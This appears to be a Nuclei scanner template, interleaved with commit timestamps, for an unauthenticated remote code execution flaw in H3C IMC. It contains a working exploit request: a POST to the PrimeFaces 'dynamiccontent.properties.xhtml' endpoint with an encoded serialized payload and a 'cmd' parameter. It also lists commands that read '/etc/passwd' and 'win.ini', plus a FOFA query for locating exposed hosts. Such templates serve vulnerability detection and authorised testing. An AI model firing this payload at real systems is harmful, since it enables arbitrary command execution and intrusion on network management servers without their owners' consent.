2021-05-31 05:53:21 +00:00
id : h3c-imc-rce
info :
2022-06-03 19:12:31 +00:00
name : H3c IMC - Remote Code Execution
2021-05-31 05:53:21 +00:00
author : pikpikcu
severity : critical
2022-06-03 19:12:31 +00:00
description : H3c IMC allows remote unauthenticated attackers to cause the remote web application to execute arbitrary commands via the 'dynamiccontent.properties.xhtml' endpoint.
2022-04-22 10:38:41 +00:00
reference :
- https://mp.weixin.qq.com/s/BP9_H3lpluqIwL5OMIJlIw
2022-06-03 19:12:31 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2023-10-14 11:27:55 +00:00
cvss-score : 10
2022-06-03 19:12:31 +00:00
cwe-id : CWE-77
2023-10-14 11:27:55 +00:00
metadata :
max-request : 2
fofa-query : body="/imc/javax.faces.resource/images/login_help.png.jsf?ln=primefaces-imc-new-webui"
2022-04-22 10:38:41 +00:00
tags : rce,h3c-imc
2021-05-31 05:53:21 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-12-23 14:53:42 +00:00
- raw :
- |
POST /imc/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
2021-05-31 05:53:21 +00:00
2021-12-23 14:53:42 +00:00
pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd={{command}}
payloads :
command :
- 'cat /etc/passwd'
- 'type C:\\Windows\\win.ini'
stop-at-first-match : true
2023-10-14 11:27:55 +00:00
2021-05-31 05:53:21 +00:00
matchers-condition : and
matchers :
- type : regex
2021-12-23 14:53:42 +00:00
part : body
2021-05-31 05:53:21 +00:00
regex :
2021-12-23 14:53:42 +00:00
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
condition : or
2021-05-31 05:53:21 +00:00
- type : status
status :
- 200
2023-10-20 11:41:13 +00:00
# digest: 4b0a00483046022100c00dfd9c0968687fa2510be29d9144f9a5ac728873a8cc3ca29c93c015459e55022100d66267fbd6eb24e0ad42deb0599b697935d08bcfa19407243922264477eccc61:922c64590222798bb761d5b6d8e72950